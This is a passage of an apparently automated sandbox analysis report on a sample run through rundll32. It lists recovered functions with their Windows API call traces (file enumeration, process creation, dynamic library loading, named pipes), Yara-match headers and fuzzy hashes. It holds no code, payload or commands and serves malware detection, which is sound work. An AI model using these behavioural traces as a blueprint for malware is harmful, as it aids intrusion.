                          • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 05B62D62
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B62DDA
                          • wsprintfA.USER32 ref: 05B62DF6
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B62E01
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B62E18
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B62EA4
                          • wsprintfA.USER32 ref: 05B62EBF
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B62ECA
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B62EE1
                          • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 05B62F03
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B62F1E
                          • wsprintfA.USER32 ref: 05B62F35
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B62F40
                            • Part of subcall function 05B63172: lstrlen.KERNEL32(05B643C6,00000000,?,?,?,?,05B643C6,00000035,00000000,?,00000000), ref: 05B631A2
                            • Part of subcall function 05B63172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B631B8
                            • Part of subcall function 05B63172: memcpy.NTDLL(00000010,05B643C6,00000000,?,?,05B643C6,00000035,00000000), ref: 05B631EE
                            • Part of subcall function 05B63172: memcpy.NTDLL(00000010,00000000,00000035,?,?,05B643C6,00000035), ref: 05B63209
                            • Part of subcall function 05B63172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05B63227
                            • Part of subcall function 05B63172: GetLastError.KERNEL32(?,?,05B643C6,00000035), ref: 05B63231
                            • Part of subcall function 05B63172: HeapFree.KERNEL32(00000000,00000000,?,?,05B643C6,00000035), ref: 05B63254
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B62F57
                          • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,05FB8A20), ref: 05B62F83
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                          • String ID:
                          • API String ID: 3130754786-0
                          • Opcode ID: d62fa00f35938ee66be761585dc788988c7a41bf96ce11d2385f3387d14f596e
                          • Instruction ID: 52c61fbd7c2628767db5a1645774dfea8ea7f9e78914d204781b3eda70aec9fa
                          • Opcode Fuzzy Hash: d62fa00f35938ee66be761585dc788988c7a41bf96ce11d2385f3387d14f596e
                          • Instruction Fuzzy Hash: 24A15B75900109BFEB219F94CC89DBEBBBAFB08304F1054A9F515A3250DB39BD45EB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B71195 Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?), ref: 05B711AA
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BB71
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?), ref: 05B7BBCC
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BBEF
                            • Part of subcall function 05B7BAD1: wcscpy.NTDLL ref: 05B7BC01
                            • Part of subcall function 05B7BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05B7BC27
                            • Part of subcall function 05B7BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 05B7BC5D
                            • Part of subcall function 05B7BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 05B7BC79
                            • Part of subcall function 05B7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 05B7BC92
                            • Part of subcall function 05B7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 05B7BCA4
                            • Part of subcall function 05B7BAD1: FindClose.KERNEL32(?), ref: 05B7BCB9
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BCCD
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BCEF
                          • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 05B71206
                          • memcpy.NTDLL(00000000,?,00000000), ref: 05B71219
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B71230
                            • Part of subcall function 05B7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 05B7BD65
                            • Part of subcall function 05B7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 05B7BD77
                            • Part of subcall function 05B7BAD1: FindClose.KERNEL32(?), ref: 05B7BD92
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 05B7125B
                          • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 05B71273
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B712CD
                          • lstrlenW.KERNEL32(00000000,?), ref: 05B712F0
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B71302
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 05B71376
                          • HeapFree.KERNEL32(00000000,?), ref: 05B71386
                            • Part of subcall function 05B6AE7C: lstrlen.KERNEL32(05B6E448,00000000,00000000,?,?,05B77A5B,?,?,?,?,05B6E448,?), ref: 05B6AE8B
                            • Part of subcall function 05B6AE7C: mbstowcs.NTDLL ref: 05B6AEA7
                          • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 05B713AF
                          • lstrlenW.KERNEL32(05B8B878,?), ref: 05B71429
                          • DeleteFileW.KERNEL32(?,?), ref: 05B71457
                          • HeapFree.KERNEL32(00000000,?), ref: 05B71465
                          • HeapFree.KERNEL32(00000000,?), ref: 05B71486
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                          • String ID:
                          • API String ID: 72361108-0
                          • Opcode ID: 17b7e11f3bb55a601151a445300bc6214bb5f69440e174c9e20d5a6d7b4d9978
                          • Instruction ID: c85ec8920366021e63ce4a241418dad46674dc9b2a7016bbfe20d252d3f7b263
                          • Opcode Fuzzy Hash: 17b7e11f3bb55a601151a445300bc6214bb5f69440e174c9e20d5a6d7b4d9978
                          • Instruction Fuzzy Hash: 129155B151021DBFCB10EBA4DC89CBA7FBEFB09350B046096F619D7151EA34B949DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B65437 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memset.NTDLL ref: 05B65465
                          • StrChrA.SHLWAPI(?,0000000D), ref: 05B654AB
                          • StrChrA.SHLWAPI(?,0000000A), ref: 05B654B8
                          • StrChrA.SHLWAPI(?,0000007C), ref: 05B654DF
                          • StrTrimA.SHLWAPI(?,05B85FCC), ref: 05B654F4
                          • StrChrA.SHLWAPI(?,0000003D), ref: 05B654FD
                          • StrTrimA.SHLWAPI(00000001,05B85FCC), ref: 05B65513
                          • _strupr.NTDLL ref: 05B6551A
                          • StrTrimA.SHLWAPI(?,?), ref: 05B65527
                          • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 05B6556F
                          • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 05B6558E
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                          • String ID: $;
                          • API String ID: 4019332941-73438061
                          • Opcode ID: f870471b9b5753b869a106ee08ced2b5e0369161b8894e33b1096c2fe689848f
                          • Instruction ID: 4bc8158428a44fb74cec58a56624f576d94021ff60b5c06dca3dda8cbf2ad79f
                          • Opcode Fuzzy Hash: f870471b9b5753b869a106ee08ced2b5e0369161b8894e33b1096c2fe689848f
                          • Instruction Fuzzy Hash: DC41A7716083069FD721EF29CC49B2BBBEAFF44600F444899F49A97281DB78F515CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B72DBB Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 136timeCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 05B72DF8
                          • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 05B72E0C
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 05B72F37
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memset.NTDLL ref: 05B72E38
                          • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05B72E70
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                          • String ID: 0x%08X$W
                          • API String ID: 95801598-2600449260
                          • Opcode ID: eecf2c847c608e06257748308f11caaa21cfe10611103c5e411d33be2f24739c
                          • Instruction ID: b8b13c3fae319142f979898123ab21ff2e945b55efea0b7685eaffdd4112bd24
                          • Opcode Fuzzy Hash: eecf2c847c608e06257748308f11caaa21cfe10611103c5e411d33be2f24739c
                          • Instruction Fuzzy Hash: 14516AB4500609BFDB20DF65C889BAABBE9FF08714F108559F969DB280D7B4F644CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7C01F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B7C034
                            • Part of subcall function 05B6AE7C: lstrlen.KERNEL32(05B6E448,00000000,00000000,?,?,05B77A5B,?,?,?,?,05B6E448,?), ref: 05B6AE8B
                            • Part of subcall function 05B6AE7C: mbstowcs.NTDLL ref: 05B6AEA7
                          • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 05B7C06D
                          • wcstombs.NTDLL ref: 05B7C077
                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 05B7C0A8
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0D4
                          • TerminateProcess.KERNEL32(?,000003E5), ref: 05B7C0EA
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0FE
                          • GetLastError.KERNEL32 ref: 05B7C102
                          • GetExitCodeProcess.KERNEL32(?,00000001), ref: 05B7C122
                          • CloseHandle.KERNEL32(?), ref: 05B7C131
                          • CloseHandle.KERNEL32(?), ref: 05B7C136
                          • GetLastError.KERNEL32 ref: 05B7C13A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                          • String ID: D
                          • API String ID: 2463014471-2746444292
                          • Opcode ID: 6ef5625f17e05f43006a3d19a4616d44011a2962a7ad053491d9a8e7fa3443e6
                          • Instruction ID: 34399ec51b6598288ca944199c3ce96190c66ff94e0d64f18798b9427ba2c4f8
                          • Opcode Fuzzy Hash: 6ef5625f17e05f43006a3d19a4616d44011a2962a7ad053491d9a8e7fa3443e6
                          • Instruction Fuzzy Hash: 5541D7B590011CBFDB11EFA4CD859EEBFB9FB08244F2044A9F511B7140EA75AE44DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B644A6 Relevance: 21.4, APIs: 14, Instructions: 391memorythreadCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05B64526
                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05B64545
                          • GetLastError.KERNEL32 ref: 05B646F6
                          • GetLastError.KERNEL32 ref: 05B64778
                          • SwitchToThread.KERNEL32(?,?,?,?), ref: 05B647C1
                          • GetLastError.KERNEL32 ref: 05B64813
                          • GetLastError.KERNEL32 ref: 05B64822
                          • RtlEnterCriticalSection.NTDLL(?), ref: 05B64832
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05B64843
                          • RtlExitUserThread.NTDLL(?), ref: 05B64851
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B648C0
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B64911
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 05B64946
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 05B64956
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                          • String ID:
                          • API String ID: 2794784202-0
                          • Opcode ID: abc1c174a230a5c60eb84ff3fc370038b02a322c5823d07e732d406eea6aa831
                          • Instruction ID: 6e61689ee8a57e4e62de1c1b8b6686d2c791606b4cad24172c0ea5b839f946b9
                          • Opcode Fuzzy Hash: abc1c174a230a5c60eb84ff3fc370038b02a322c5823d07e732d406eea6aa831
                          • Instruction Fuzzy Hash: B9E149B1500649AFEF209FA0CC89EBA7BBAFF09305F1045A9F91AD3151EB74A954CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6BFF0 Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON
                          Download Yara Rule
                          APIs
                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 05B6C03F
                          • StrTrimA.SHLWAPI(00000001,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 05B6C058
                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 05B6C063
                          • StrTrimA.SHLWAPI(00000001,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 05B6C07C
                          • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 05B6C11F
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B6C141
                          • lstrcpy.KERNEL32(00000020,?), ref: 05B6C160
                          • lstrlen.KERNEL32(?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 05B6C16A
                          • memcpy.NTDLL(?,?,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 05B6C1AB
                          • memcpy.NTDLL(?,?,?,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 05B6C1BE
                          • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057), ref: 05B6C1E2
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,05B785F1,?,00000000,0000001E), ref: 05B6C201
                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?), ref: 05B6C227
                          • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?), ref: 05B6C243
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                          • String ID:
                          • API String ID: 3323474148-0
                          • Opcode ID: 764f28023c339ba07db3c6de74ae7773a1b0ad07c3e4073e9be52b2000196331
                          • Instruction ID: 3342362a908129a45d769537b1f448b5298de52b80b2309d6a3bc1daeb8dd5ab
                          • Opcode Fuzzy Hash: 764f28023c339ba07db3c6de74ae7773a1b0ad07c3e4073e9be52b2000196331
                          • Instruction Fuzzy Hash: 27715971608305AFC721DF68C845A6ABFE9FB48314F14496EF99AD3250DB38F944CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B705BC Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,?,00000000), ref: 05B705D3
                          • lstrlen.KERNEL32(?,?,00000000), ref: 05B705DA
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B705F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B70602
                          • lstrcat.KERNEL32(?,?), ref: 05B7061E
                          • lstrcat.KERNEL32(?,?), ref: 05B7062F
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B70640
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B706DD
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 05B70716
                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 05B7072F
                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 05B70739
                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05B70749
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05B70762
                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05B70772
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                          • String ID:
                          • API String ID: 333890978-0
                          • Opcode ID: d77d4d82e4c3fc3dfec3076f669a0958be942e800b069f77dcb60a393c79af1f
                          • Instruction ID: 1b38a476c0fa84bc34bbeb985a300c900ae0644c21aacce56d5c97f13ba3b97a
                          • Opcode Fuzzy Hash: d77d4d82e4c3fc3dfec3076f669a0958be942e800b069f77dcb60a393c79af1f
                          • Instruction Fuzzy Hash: A051897641010DBFDB11AFA4CC89CBE7FBEFF48254B1590A6FA16A7110DA31AA05DF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7AFC2 Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,00000000,?,?,?,05B6663D,?,?), ref: 05B7AFCF
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,05B6663D,?,?), ref: 05B7AFF8
                          • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 05B7B018
                          • lstrcpyW.KERNEL32(-00000002,?), ref: 05B7B034
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,05B6663D,?,?), ref: 05B7B040
                          • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,05B6663D,?,?), ref: 05B7B043
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,05B6663D,?,?), ref: 05B7B04F
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B06C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B086
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B09C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0B2
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0C8
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0DE
                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,05B6663D,?,?), ref: 05B7B107
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                          • String ID:
                          • API String ID: 3772355505-0
                          • Opcode ID: 9b2a5e615d2e11c9fab5a720fb676d3ce58585ddf2f64b78109b6fe5808b6e5d
                          • Instruction ID: 31d75312689cf7671ec46d4ed3516a90b55ac832f9061abcd9e7c495ac033854
                          • Opcode Fuzzy Hash: 9b2a5e615d2e11c9fab5a720fb676d3ce58585ddf2f64b78109b6fe5808b6e5d
                          • Instruction Fuzzy Hash: EB3167B161420AAFDB10AF64DC86D66BFEDFF05214B145466F915CB251EB34F804CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6D016 Relevance: 21.1, APIs: 14, Instructions: 82stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D02D
                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D038
                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D040
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B6D055
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B6D066
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B6D078
                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D07D
                          • lstrcatW.KERNEL32(00000000,05B853E0), ref: 05B6D089
                          • lstrcatW.KERNEL32(00000000), ref: 05B6D092
                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D097
                          • lstrcatW.KERNEL32(00000000,05B853E0), ref: 05B6D0A3
                          • lstrcatW.KERNEL32(00000000,00000002), ref: 05B6D0BF
                          • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D0C7
                          • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D0D5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                          • String ID:
                          • API String ID: 3635185113-0
                          • Opcode ID: a4983ac5414adf4c156bbc62a8a5310ac132083a774fd341301328c007ed68d2
                          • Instruction ID: 5989bf1d6bd669baefb1b31ecb64344e94cb0661fc92cb145edef476dbbef49f
                          • Opcode Fuzzy Hash: a4983ac5414adf4c156bbc62a8a5310ac132083a774fd341301328c007ed68d2
                          • Instruction Fuzzy Hash: 9B21CD32210205BFD3316B249C86E7FBFAAEF85A95F11141AF90697190CF64B806DAA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7E19A Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B67A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05B67AA6
                            • Part of subcall function 05B67A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05B67ABE
                            • Part of subcall function 05B67A61: WaitForSingleObject.KERNEL32(00000000,?,05B787CC,?,?), ref: 05B67B86
                            • Part of subcall function 05B67A61: HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67BAF
                            • Part of subcall function 05B67A61: HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67BBF
                            • Part of subcall function 05B67A61: RegCloseKey.ADVAPI32(?,?,05B787CC,?,?), ref: 05B67BC8
                          • lstrcmp.KERNEL32(?,00000000), ref: 05B7E211
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,05B6399C,00000000,00000000), ref: 05B7E23D
                          • GetCurrentThreadId.KERNEL32 ref: 05B7E2EE
                          • GetCurrentThread.KERNEL32 ref: 05B7E2FF
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,05B6399C,00000001,76CDF730,00000000,00000000), ref: 05B7E33C
                          • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,05B6399C,00000001,76CDF730,00000000,00000000), ref: 05B7E350
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B7E35E
                          • wsprintfA.USER32 ref: 05B7E376
                            • Part of subcall function 05B63263: lstrlen.KERNEL32(?,00000000,05B83716,00000000,05B72466,?,?,?,05B78A07,?,?,?,00000000,00000001,00000000,?), ref: 05B6326D
                            • Part of subcall function 05B63263: lstrcpy.KERNEL32(00000000,?), ref: 05B63291
                            • Part of subcall function 05B63263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,05B78A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05B63298
                            • Part of subcall function 05B63263: lstrcat.KERNEL32(00000000,?), ref: 05B632EF
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B7E381
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B7E398
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7E3A9
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7E3B5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                          • String ID:
                          • API String ID: 773763258-0
                          • Opcode ID: 4ad58560b39f0c60d441544e6c7c1d0e1cf0fee22246e39b5e8fc0c2ac18240c
                          • Instruction ID: c49c890bcac05fc6f62e2b8cfca8c748127b7797b9b1ed8727ba83aa7d107001
                          • Opcode Fuzzy Hash: 4ad58560b39f0c60d441544e6c7c1d0e1cf0fee22246e39b5e8fc0c2ac18240c
                          • Instruction Fuzzy Hash: B4710471910219EFCB11DFA5D889DAEBFBAFF09310F1440A5F615A7220DB30BA45DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B651FF Relevance: 18.2, APIs: 12, Instructions: 186synchronizationstringthreadCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05B65226
                          • memcpy.NTDLL(?,?,00000010), ref: 05B65249
                          • memset.NTDLL ref: 05B65295
                          • lstrcpyn.KERNEL32(?,?,00000034), ref: 05B652A9
                          • GetLastError.KERNEL32 ref: 05B652D7
                          • GetLastError.KERNEL32 ref: 05B6531E
                          • GetLastError.KERNEL32 ref: 05B6533D
                          • WaitForSingleObject.KERNEL32(?,000927C0), ref: 05B65377
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B65385
                          • GetLastError.KERNEL32 ref: 05B65408
